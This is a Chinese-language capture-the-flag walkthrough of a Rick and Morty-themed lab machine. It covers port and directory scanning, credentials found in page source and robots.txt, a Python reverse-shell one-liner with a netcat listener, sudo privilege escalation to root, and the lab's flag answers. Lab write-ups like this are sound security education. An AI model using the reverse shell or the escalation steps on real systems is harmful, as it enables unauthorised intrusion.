This Rick and Morty-themed challenge requires you to exploit a web server and find three ingredients to help Rick make his potion and transform himself back into a human from a pickle.
这个以瑞克和莫蒂为主题的挑战需要你利用网络服务器并找到三种成分来帮助瑞克制作他的药水,并将自己从泡菜变回人类。

1.扫面端口服务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root㉿kali)-[/home/ace]
└─# nmap -T4 -sC -sV  10.10.77.88 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-02 20:35 CST
Nmap scan report for 10.10.77.88
Host is up (0.26s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 1fe0d95dd18260868b59be032663c81e (RSA)
|   256 e35968585967939fe85d95b2d4d687d1 (ECDSA)
|_  256 616fd51e2aa6ee0675204c9a8b5e2111 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.74 seconds

80端口开放,可以尝试访问web

2.页面追踪

image-20230802204127203

查看源码:

image-20230802204202036

哦买噶,账号:R1ckRul3s

扫目录,看看能不能利用:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(root㉿kali)-[/home/ace]
└─# dirsearch  -u http://10.10.77.88/

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                        
 (_||| _) (/_(_|| (_| )                                                                                                                                                 
                                                                                                                                                                        
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/10.10.77.88/-_23-08-02_20-45-25.txt

Error Log: /root/.dirsearch/logs/errors-23-08-02_20-45-25.log

Target: http://10.10.77.88/

[20:45:26] Starting:                             
[20:45:40] 403 -  291B  - /.php3                                           
[20:46:21] 200 -    2KB - /assets/                                          
[20:46:21] 301 -  311B  - /assets  ->  http://10.10.77.88/assets/           
[20:46:52] 200 -    1KB - /index.html                                       
[20:46:59] 200 -  882B  - /login.php                                        
[20:47:20] 200 -   17B  - /robots.txt                                       
[20:47:22] 403 -  300B  - /server-status/                                   
[20:47:22] 403 -  299B  - /server-status
                                                                             
Task Completed

查看robots.txt

image-20230802205020703

这可能是密码:Wubbalubbadubdub

进login试试

哦耶!!!

image-20230802205302313

image-20230802205402871

shit!!!这里埋伏老子!!!

反弹试试

less阅读

image-20230802210228010

3.反弹shell

1
export RHOST="<YOUR IP>";export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

本地监听4444

1
nc -lvnp 4444

连接成功!!!

1
2
3
4
5
6
7
8
9
┌──(root㉿kali)-[/home/ace]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.18.75.12] from (UNKNOWN) [10.10.77.88] 54194
$ ls
ls
Sup3rS3cretPickl3Ingred.txt  clue.txt    index.html  portal.php
assets                       denied.php  login.php   robots.txt
$

下面查看第二个成分:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@ip-10-10-77-88:/var/www/html$ cd ../../..
cd ../../..
www-data@ip-10-10-77-88:/$ ls
ls
bin   etc         lib         media  proc  sbin  sys  var
boot  home        lib64       mnt    root  snap  tmp  vmlinuz
dev   initrd.img  lost+found  opt    run   srv   usr
www-data@ip-10-10-77-88:/$ cd home
cd home
www-data@ip-10-10-77-88:/home$ ls
ls
rick  ubuntu
www-data@ip-10-10-77-88:/home$ cd rick
cd rick
www-data@ip-10-10-77-88:/home/rick$ ls
ls
second ingredients
www-data@ip-10-10-77-88:/home/rick$ cat second ingredients
cat second ingredients
cat: second: No such file or directory
cat: ingredients: No such file or directory
www-data@ip-10-10-77-88:/home/rick$ cat "second ingredients"
cat "second ingredients"
1 jerry tear
www-data@ip-10-10-77-88:/home/rick$

4.sudo提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
www-data@ip-10-10-77-88:/home/rick$ sudo -l
sudo -l
Matching Defaults entries for www-data on
    ip-10-10-77-88.eu-west-1.compute.internal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on
        ip-10-10-77-88.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL
www-data@ip-10-10-77-88:/home/rick$ sudo /bin/bash
sudo /bin/bash
root@ip-10-10-77-88:/home/rick# ls
ls
second ingredients
root@ip-10-10-77-88:/home/rick# cd ../..
cd ../..
root@ip-10-10-77-88:/# cd root
cd root
root@ip-10-10-77-88:~# ls
ls
3rd.txt  snap
root@ip-10-10-77-88:~# cat 3rd.txt
cat 3rd.txt
3rd ingredients: fleeb juice
root@ip-10-10-77-88:~#

over!!!